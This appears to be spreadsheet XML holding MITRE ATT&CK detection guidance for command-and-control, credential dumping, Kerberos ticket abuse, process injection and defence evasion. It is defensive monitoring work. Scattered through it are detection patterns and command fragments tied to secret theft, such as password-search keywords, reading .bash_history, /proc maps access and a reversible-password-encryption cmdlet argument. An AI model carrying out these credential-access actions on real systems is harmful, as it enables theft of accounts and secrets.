    <t>Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.</t>
  </si>
  <si>
    <t>Monitor for applications and processes related to remote admin tools. Correlate activity with other suspicious behavior that may reduce false positives if these tools are used by legitimate users and administrators.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for the port that is being used.
[Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions.</t>
  </si>
  <si>
    <t>Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.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standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)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</si>
  <si>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Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)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 
Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.
The Wake-on-LAN magic packet consists of 6 bytes of &lt;code&gt;FF&lt;/code&gt; followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN)</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as [ftp](https://attack.mitre.org/software/S0095), that does not normally occur may also be suspicious.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Specifically, for the finger utility on Windows and Linux systems, monitor command line or terminal execution for the finger command. Monitor network activity for TCP port 79, which is used by the finger utility, and Windows &lt;code&gt;netsh interface portproxy&lt;/code&gt; modifications to well-known ports such as 80 and 443. Furthermore, monitor file system for the download/creation and execution of suspicious files, which may indicate adversary-downloaded payloads. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media is mounted.</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</si>
  <si>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</si>
  <si>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Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another).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
Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).</t>
  </si>
  <si>
    <t>Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages&lt;/code&gt;) and correlate then investigate the DLL files these files reference. 
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
Monitor for calls to &lt;code&gt;OpenProcess&lt;/code&gt; that can be used to manipulate lsass.exe running on a domain controller as well as for malicious modifications to functions exported from authentication-related system DLLs (such as cryptdll.dll and samsrv.dll).(Citation: Dell Skeleton) 
Monitor PAM configuration and module paths (ex: &lt;code&gt;/etc/pam.d/&lt;/code&gt;) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Monitor for suspicious additions to the /Library/Security/SecurityAgentPlugins directory.(Citation: Xorrior Authorization Plugins)
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: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Monitor property changes in Group Policy that manage authentication mechanisms (i.e. [Group Policy Modification](https://attack.mitre.org/techniques/T1484/001)). The &lt;code&gt;Store passwords using reversible encryption&lt;/code&gt; configuration should be set to Disabled. Additionally, monitor and/or block suspicious command/script execution of &lt;code&gt;-AllowReversiblePasswordEncryption $true&lt;/code&gt;, &lt;code&gt;Set-ADUser&lt;/code&gt; and &lt;code&gt;Set-ADAccountControl&lt;/code&gt;. Finally, monitor Fine-Grained Password Policies and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)
</t>
  </si>
  <si>
    <t>While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
Monitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments  indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior.
Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.
Additionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.</t>
  </si>
  <si>
    <t>Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials. Also monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network.</t>
  </si>
  <si>
    <t>Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.
In cloud-based environments, monitor for the creation of new traffic mirrors or modification of existing traffic mirrors. For network infrastructure devices, collect AAA logging to monitor for the capture of network traffic.</t>
  </si>
  <si>
    <t>Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
Security analysts can hunt for malicious apps using the tools available in their CASB, identity provider, or resource provider (depending on platform.) For example, they can filter for apps that are authorized by a small number of users, apps requesting high risk permissions, permissions incongruous with the app’s purpose, or apps with old “Last authorized” fields. A specific app can be investigated using an activity log displaying activities the app has performed, although some activities may be mis-logged as being performed by the user. App stores can be useful resources to further investigate suspicious apps.
Administrators can set up a variety of logs and leverage audit tools to monitor actions that can be conducted as a result of OAuth 2.0 access. For instance, audit reports enable admins to identify privilege escalation actions such as role creations or policy modifications, which could be actions performed after initial access.</t>
  </si>
  <si>
    <t>### Windows
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well. 
On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like [Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols  (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
### Linux
To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/&lt;pid&gt;/maps&lt;/code&gt;, where the &lt;code&gt;&lt;pid&gt;&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>Monitor system calls, file read events, and processes for suspicious activity that could indicate searching for a password  or other activity related to performing keyword searches (e.g. password, pwd, login, store, secure, credentials, etc.) in process memory for credentials. File read events should be monitored surrounding known password storage applications.</t>
  </si>
  <si>
    <t>Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t>Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor user account logs as well as 2FA/MFA application logs for suspicious events: unusual login attempt source location, mismatch in location of login attempt and smart device receiving 2FA/MFA request prompts, and high volume of repeated login attempts, all of which may indicate user's primary credentials have been compromised minus 2FA/MFA mechanism. </t>
  </si>
  <si>
    <t>Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior.
Similar to [Input Capture](https://attack.mitre.org/techniques/T1056), keylogging activity can take various forms but can may be detected via installation of a driver, setting a hook, or usage of particular API calls associated with polling to intercept keystrokes.</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within ticket granting tickets (TGTs), and ticket granting service (TGS) requests without preceding TGT requests.(Citation: ADSecurity Detecting Forged Tickets)(Citation: Stealthbits Detect PtT 2019)(Citation: CERT-EU Golden Ticket Protection)
Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)
Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.
Monitor for unusual processes accessing &lt;code&gt;secrets.ldb&lt;/code&gt; and &lt;code&gt;.secrets.mkey&lt;/code&gt; located in &lt;code&gt;/var/lib/sss/secrets/&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.</t>
  </si>
  <si>
    <t>Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. Credential resources obtained through exploitation may be detectable in use if they are not normally used or seen.</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: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Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: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t>
  </si>
  <si>
    <t>Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014)</t>
  </si>
  <si>
    <t>BITS runs as a service and its status can be checked with the Sc query utility (&lt;code&gt;sc query bits&lt;/code&gt;).(Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (&lt;code&gt;bitsadmin /list /allusers /verbose&lt;/code&gt;).(Citation: Microsoft BITS)
Monitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options)(Citation: Microsoft BITS) Admin logs, PowerShell logs, and the Windows Event log for BITS activity.(Citation: Elastic - Hunting for Persistence Part 1) Also consider investigating more detailed information about jobs by parsing the BITS job database.(Citation: CTU BITS Malware June 2016)
Monitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account).(Citation: Microsoft BITS)</t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.
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Monitor for changes to environment variables, as well as the commands to implement these changes.
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.</t>
  </si>
  <si>
    <t xml:space="preserve">Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017)
Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure "Hide Microsoft Entries" and "Hide Windows Entries" are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) 
Monitor and investigate attempts to modify extended file attributes with utilities such as &lt;code&gt;xattr&lt;/code&gt;. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. </t>
  </si>
  <si>
    <t>Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
Monitor environment variables and APIs that can be leveraged to disable security measures.</t>
  </si>
  <si>
    <t>Detecting the use of guardrails may be difficult depending on the implementation. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007), especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).
Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.</t>
  </si>
  <si>
    <t>Monitor for unexpected Docker image build requests to the Docker daemon on hosts in the environment. Additionally monitor for subsequent network communication with anomalous IPs that have never been seen before in the environment that indicate the download of malicious code.</t>
  </si>
  <si>
    <t>Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)
Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended.</t>
  </si>
  <si>
    <t>Virtualization, sandbox, user activity, and related discovery techniques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virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.</t>
  </si>
  <si>
    <t>Debugger related system checks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debugger identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious [Native API](https://attack.mitre.org/techniques/T1106) function calls as well as processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.
Monitor debugger logs for signs of abnormal and potentially malicious activity.</t>
  </si>
  <si>
    <t>Monitor for suspicious or unknown container images and pods in your environment. Deploy logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application pods to detect malicious activity at the cluster level. In Docker, the daemon log provides insight into remote API calls, including those that deploy containers. Logs for management services or applications used to deploy containers other than the native technologies themselves should also be monitored.</t>
  </si>
  <si>
    <t xml:space="preserve">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&lt;code&gt;CreateRemoteThread&lt;/code&gt;, &lt;code&gt;SuspendThread&lt;/code&gt;/&lt;code&gt;SetThreadContext&lt;/code&gt;/&lt;code&gt;ResumeThread&lt;/code&gt;, &lt;code&gt;QueueUserAPC&lt;/code&gt;/&lt;code&gt;NtQueueApcThread&lt;/code&gt;, and those that can be used to modify memory within another process, such as &lt;code&gt;VirtualAllocEx&lt;/code&gt;/&lt;code&gt;WriteProcessMemory&lt;/code&gt;, may be used for this technique.(Citation: Elastic Process Injection July 2017) 
Monitor DLL/PE file events, specifically creation of these binary files as well as the loading of DLLs into processes. Look for DLLs that are not recognized or not normally loaded into a process. 
Monitoring for Linux specific calls such as the ptrace system call should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods.(Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits) 
Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules.(Citation: Microsoft Sysmon v6 May 2017) 
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. </t>
  </si>
  <si>
    <t>If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging)
If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior. 
There are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., &lt;code&gt;LogonUser&lt;/code&gt; (Citation: Microsoft LogonUser), &lt;code&gt;DuplicateTokenEx&lt;/code&gt;(Citation: Microsoft DuplicateTokenEx), and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt;(Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.
Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account.(Citation: BlackHat Atkinson Winchester Token Manipulation)
Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.</t>
  </si>
  <si>
    <t>Monitor the file system for files that have the setuid or setgid bits set. Also look for any process API calls for behavior that may be indicative of [Process Injection](https://attack.mitre.org/techniques/T1055) and unusual loaded DLLs through [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), which indicate attempts to gain access to higher privileged processes. On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo).
Consider monitoring for &lt;code&gt;/usr/libexec/security_authtrampoline&lt;/code&gt; executions which may indicate that AuthorizationExecuteWithPrivileges is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges is being called. Monitoring OS API callbacks for the execution can also be a way to detect this behavior but requires specialized security tooling.
On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the &lt;code&gt;LOG_INPUT&lt;/code&gt; and &lt;code&gt;LOG_OUTPUT&lt;/code&gt; directives in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file.
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed. Some UAC bypass methods rely on modifying specific, user-accessible Registry settings. Analysts should monitor Registry settings for unauthorized changes.</t>
  </si>
  <si>
    <t>It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes &lt;code&gt;Set federation settings on domain&lt;/code&gt; and &lt;code&gt;Set domain authentication&lt;/code&gt;.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)
Consider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate)</t>
  </si>
  <si>
    <t>Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage.</t>
  </si>
  <si>
    <t>Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>There is no documented method for defenders to directly identify behaviors that weaken encryption. Detection efforts may be focused on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601). Some detection methods require vendor support to aid in investigation.</t>
  </si>
  <si>
    <t>Monitor and investigate attempts to modify ACLs and file/directory ownership. Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files.  Events not stored on the file system may require different detection mechanisms.</t>
  </si>
  <si>
    <t>Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands/files and/or spawning child processes/network connections. (Citation: RSA Forfiles Aug 2017)</t>
  </si>
  <si>
    <t>Analyze process behavior to determine if user document applications (such as Office) are performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.
Monitor .rtf files for strings indicating the &lt;code&gt;&amp;#42;\template&lt;/code&gt; control word has been modified to retrieve a URL resource, such as &lt;code&gt;&amp;#42;\template http&lt;/code&gt; or &lt;code&gt;&amp;#42;\template \u-&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
Use process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t xml:space="preserve">Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system). 
Flag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016) 
Obfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection. 
The first detection of a malicious tool may trigger an anti-virus or other security tool alert. Similar events may also occur at the boundary through network IDS, email scanning appliance, etc. The initial detection should be treated as an indication of a potentially more invasive intrusion. The alerting system should be thoroughly investigated beyond that initial alert for activity that was not detected. Adversaries may continue with an operation, assuming that individual events like an anti-virus detect will not be investigated or that an analyst will not be able to conclusively link that event to other activity occurring on the network. </t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
